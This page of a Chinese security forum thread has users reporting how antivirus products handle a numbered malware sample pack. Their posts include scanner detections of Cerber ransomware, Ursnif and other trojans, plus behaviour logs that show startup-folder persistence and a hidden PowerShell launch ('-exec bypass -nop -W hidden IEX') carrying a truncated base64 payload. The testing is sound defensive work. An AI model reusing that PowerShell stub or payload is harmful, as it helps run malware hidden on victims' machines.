12
返回列表 发新帖
楼主: petr0vic
收起左侧

[病毒样本] #11 (17.01.24)

[复制链接]
XZ8SM7Sx0bVkoUV
发表于 2017-1-25 10:46:38 | 显示全部楼层
kill 3

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
桑德尔
头像被屏蔽
发表于 2017-1-25 14:36:17 | 显示全部楼层
腾讯KILL6个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
轩夏
发表于 2017-2-15 17:25:39 | 显示全部楼层
MSE 断网
C:\Users\MSI\Desktop\11\01.exe
Infected: Ransom:Win32/Cerber!rfn
C:\Users\MSI\Desktop\11\02.exe
Infected: Trojan:Win32/Dynamer!ac
C:\Users\MSI\Desktop\11\03.exe
Infected: Ransom:Win32/Cerber!rfn
C:\Users\MSI\Desktop\11\04.exe
Infected: TrojanSpy:Win32/Ursnif
C:\Users\MSI\Desktop\11\06.exe
Infected: Trojan:Win32/Skeeyah.A!rfn
C:\Users\MSI\Desktop\11\07.exe
Infected: Trojan:Win32/Dynamer!ac
C:\Users\MSI\Desktop\11\08.exe
Infected: Ransom:Win32/Milicry.A
天耀群星
头像被屏蔽
发表于 2017-2-15 20:51:06 | 显示全部楼层
2017/2/15 20:42:12    创建文件    允许
进程: c:\users\zheng\desktop\01.exe
目标: C:\Users\zheng\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\01.exe
规则: [应用程序组]垃圾屏蔽 35 -> [文件组]所有执行文件 -> [文件]*; *.exe

2017/2/15 20:42:12    创建文件    允许
进程: c:\users\zheng\desktop\01.exe
目标: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\01.exe
规则: [应用程序组]垃圾屏蔽 35 -> [文件组]所有执行文件 -> [文件]*; *.exe

【1】2017-02-15 20:49:04,系统防御,执行防护,10.exe触犯执行防护规则, 结束进程

操作者:C:\Users\zheng\Desktop\10.exe
命令行:"C:\Users\zheng\Desktop\10.exe"
风险动作:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $($s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANcwhlgCA51WbW/bNhD+7l9xcLVaQixCcTsgCJBirpJuAbLWqLzlg2EgtHSOtcikSlJ+QeL/PlKiLDlO0GUCDFvk8bnnnnuh38GIr1HMCwY+3IpUKWQw28Jn/TUuBEMB7+GSrhD+oCLZdjraMlYpZ/A7Kv8WZ3GWIlPQeeyAfpx1DBfwFdf+t9k/GCvwx9scv9Il6kVFtH1Y2tfG5C+JlzinRaZCgYneSWkmNYSjRIF7q5Hgmy15ZqHXWyu1bWfXUMzr0DqPUO6PqKBLt/o9iZRI2f3UCflySVnSP1yNZBZz9mzxkq9ZxmlSrnoWU/AYpQQrwJInRYaG4G+uB5VJOge3dgM+/oDuLGVJ1ys3q3Pl2SyVWn4t+YV2udW/l8SoFvH4AZUk4zi/sRbTs+Dsw/FBIhUVyvi1nstdm6KLlt0wjjFXGrBKh1tR2b1GV+AKhcRjxnvoVspfYh6OrKPuaUBOP+jPxwE5G3T7Jg7rvFMJKJVAujRsK3CiCy0q1zTLhl+Vn4qeqZWuTUeLnJRZVIO9wg/jQtf8lkS1qWv99525Lirsu4/OWKPvwKcSJgdnvuOSKwxRqHSexlTh3zRLE2oqL6RZNqPxw9TzXqBDhoVamLI1h4byZWW8VgIbSZqQ2ppNZluFk+nUMd+m9AJCBoF+nn55DHZWVmRJve1OFG4UQRbzxNT1+fkwCq+vPSP1Z2Pjdm91gfK1rKZDtMAsA1Ewpq1BC1FIXaRdOAEH2ercvDHT4id6TedkvxHzZV6oZvOOhTzfivR+ocANPRgEp7/Cn2ksuORzBSEXORelgASGxqOxlCBQO1hhQu7YHbM1aDUhZmSh20TXD/rNC7lBdq8W7bKpO7hdOEd18zapJidTuNGQRhvb/WTP8+1c61
用户操作:结束进程

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【1】2017-02-15 20:48:36,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Cerber, 已清除

病毒名称:BEHAV:Ransom/Cerber
文件路径:C:\Users\zheng\Desktop\08.exe
用户操作:已清除

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【1】2017-02-15 20:48:25,病毒防御,病毒查杀,自定义扫描,发现7个风险项目

病毒库:2017/02/15 16:00
开始时间:2017/02/15 20:48
总计用时:00:00:07
扫描对象:28个
发现威胁:7个
已处理威胁:7个
发现系统修复项:0个
处理系统修复项:0个
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-26 11:13 , Processed in 0.081515 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表